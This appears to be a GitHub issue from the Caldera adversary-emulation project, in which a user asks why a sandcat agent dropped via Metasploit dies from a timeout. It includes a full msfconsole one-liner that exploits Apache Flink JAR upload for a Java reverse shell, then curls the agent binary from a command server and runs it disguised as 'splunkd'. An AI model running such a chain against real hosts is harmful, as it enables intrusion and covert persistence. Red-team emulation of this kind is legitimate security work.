Attempting to achieve lateral movement using sandcat agent and metasploit #2957

NoorElAlfi opened this issue Apr 23, 2024 · 2 comments
@NoorElAlfi

Hello,

I am trying to use Caldera alongside Metasploit to achieve lateral movement on a Linux target host. I've managed to get a Metasploit one-line command to achieve a reverse shell and run a sandcat agent on the target host. This is the command I've been using that works through the terminal:

```
msfconsole -q -x "use exploit/multi/http/apache_flink_jar_upload_exec; \
set rhosts x.x.x.x; \
set payload java/shell_reverse_tcp; \
exploit -j; \
sessions -i 1 -c 'curl -s -X POST -H \"file:sandcat.go\" -H \"platform:linux\" \"http://x.x.x.x:8888\"/file/download > splunkd'; \
sessions -i 1 -c 'chmod +x splunkd'; \
sessions -i 1 -c './splunkd -server \"http://x.x.x.x:8888\" -group red -v; &";
```

Bug Description
Whenever I attempt to run this through the Caldera web server using a sandcat agent, I either get an "stty: 'standard input': Inappropriate ioctl for device" error, or the command actually goes through and starts the sandcat agent on the target host but is short-lived as a result of the process being killed due to a timeout. I've attempted to mitigate the second issue by running the agent in the background using an &, but the process still gets killed anyway. Is there any way I can have the sandcat agent persist on the target host without worrying about the command timing out? (Screenshots of the errors are below in the Screenshots section.)

To Reproduce
Steps to reproduce the behavior:

  1. Run an instance of Caldera on an attacking Linux host with Metasploit installed, and using a sandcat agent I load the Metasploit abilities onto Caldera using the access plugin.
  2. I generate an adversary consisting of the reverse shell exploit I'm using. I update the command to the one above and hardcode the target host's IP into the command for testing purposes.
  3. I run the operation using the adversary I just generated through the sandcat agent. The reverse shell is achieved and the sandcat agent is briefly started, just to be killed due to timeout or the "stty: 'standard input': Inappropriate ioctl for device" error.

Expected behavior
I am wanting the command to be considered successful by the operation status, and the sandcat agent to persist on the target host without the process being killed.

Screenshots
error1
error2

Desktop:

  • OS: Ubuntu 18.04
  • Browser: Chromium

Looks like your first issue -- we aim to respond to issues as quickly as possible. In the meantime, check out our documentation here: http://caldera.readthedocs.io/

@elegantmoose
Contributor

@NoorElAlfi Apologies for the late response. TLDR - I'm not the right person for looking into this issue. I'm going to have to see if anyone on the team has messed with Metasploit integrations recently.

*Also, let us know if you make progress.
